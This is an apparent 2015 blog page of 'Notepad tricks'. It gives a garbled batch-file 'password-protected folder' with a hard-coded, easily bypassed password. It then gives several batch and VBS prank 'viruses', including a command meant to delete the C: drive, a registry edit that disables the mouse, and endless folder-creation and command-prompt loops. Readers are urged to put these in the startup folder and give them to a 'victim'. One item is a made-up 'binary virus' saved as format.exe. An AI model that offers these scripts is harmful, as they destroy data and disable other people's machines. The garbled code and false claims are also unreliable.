Friday 29 May 2015

on 1 comment




 Create Your Password Protected Folder 

 








 1.Before you get started you need to create a folder that will house your password protected folder, this is just an ordinary folder and can be located anywhere and named anything.








2.Navigate into your newly created folder and create a new Text Document. This can easily be done from the context menu.

3.Open the document, now paste the following code into the contents of the document:
ker" cls
@ECHO OFF
title Folder Private
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "HTG Loc
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End


Thursday 28 May 2015

on 2 comments


Notepad tricks

1.Virus that creates folder inside folder infinitely:-


1. Open Notepad and copy paste the following

code in it.notpad ticks

@echo off

:l

md lol

cd lol

goto l






2. Save it on desktop with "virus.bat" or

"anything.bat".

3. Double click on this batch file to see its effect

!!!!!!!!Apekshit!!!!!!!!!

2.How we create more then 10000 Empty Folder.


1) Open your notepad and type the following code.


@echo off

:top

md %random%

goto top

2) Save as anyname.bat

3) Click to Open anyname.bat


!!!!!!!!Apekshit!!!!!!!!!

3.Virus To Crash Windows XP


 1.Just open notepad and copy the below code.

@Echo off

Del C:\ *.* |y












2.Save the file as anyname.bat and you are done!

3.What is the effect of the virus?

4.This virus will clean your entire C: drive and windows xp will never start untill you reinstall it.


4.Virus To Disable Mouse


1.Open notepad and copy the code given below.

rem ---------------------------------

rem Disable Mouse

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

reg delete %key%

reg add %key% /v Start /t REG_DWORD /d 4

rem ---------------------------------

2.Save the above code as anyname.bat

3.What is the effect of the virus?

4.This virus will permanently disable your mouse, so try it at your own risk.






5.Virus To Open Unlimited Command Prompts

1.Open notepad and copy the following code.

 

@echo off

:abc

start

goto abc






2.Save the above code with anyname.bat

3.What is the effect of the virus?

4.This virus opens unlimited command prompts.


NOTE: Similarly as start you can put start notepad, wordpad, etc to open that particular thing unlimited times. If you put this virus in startup folder then the virus works when the pc starts and the pc is hanged.

6.Create Binary Virus to Format Hard Disk:-->

1.Open notepad-->Write the code given below:

010010110001111100100101010101

01010000011111100000


2.-->Save the file as format.exe


7. Create Funny Harmless Virus!!!

Adarsh Sojitra 09:09 computer , Fun , Notepad No comments

Hello visitors........I am back with a trick by which you can annoy your friends by using Just notepad.This trick is HARMLESS!!!!!! virus.By this trick file one file will be created then it will never close, means when you will press "X" or "OK" then one dialog box will open Again press "X" or "OK" then again one dialog box will open and this will continue till INFINITY.But i have also posted that how to stop it.Just follow the below steps to learn this trick.



1.Open Notepad or any text editor like Progeammer's notepad or Notepad++.(Anyone)



2.Copy the following code to your text editor.

do

annoy=msgbox("This message will never stop hehehehehehehe!!!!!!!!",10,"Warning")

loop



3.Save the created file as TWH.vbs at any location you want.



4.Double click on "TWH.vbs" and you will see like a following box



5.You can not close this box by clicking on "X" or "OK" (That's the trick).



HOW TO CLOSE:



6.Press "ALT+CTRL+DEL"(Shortcut) and open the task manager.Then go to "Processes" tab and select "wscript.exe" and then End process then OK.



7.Now you can see that the box is not there on your screen and its closed.



EnJoY TrIcKs.........

7.Guys here is a malware virus enjox.

1. Open notepad and type

@echo off

:VIRUS

cd /d C:

md %RANDOM%

cd /d D:

md %RANDOM%

cd /d E:

md %RANDOM%

goto VIRUS

REM #######################

REM errorcode401.blogspot.in

2. save it as virus.bat.

3. thats all u have created a virus

give it to victim and do it at ur own risk.

Like ·

8.How To Create The Matrixs



1.open Notepad (to do so click start, all programs, accessories, and notepad) paste this code:
@echo off
color 0a
:A
echo 7 y x 3 8 G M P q 1 F 0 U v c i j
ping localhost -n 1 > nul
echo o D s a E I j H 9 t 6 7 z C B 4 g 8
ping localhost -n 1 > nul
echo g F x 6 A e 9 1 b M W r T h k P 8 3
ping localhost -n 1 > nul
echo j G a e 3 5 B x Z Q p 0 o 2 h V u C
ping localhost -n 1 > nul
echo 7 f S E A q p 7 b d h U C V 1 4 8 3
ping localhost -n 1 > nul

goto A
2.Now go to File, save as, now save as Matrix.bat (you must save it as .bat) then a new icon will pop up on your desktop click it and enjoy


:- By Apekshit Tehra
Powered by Blogger.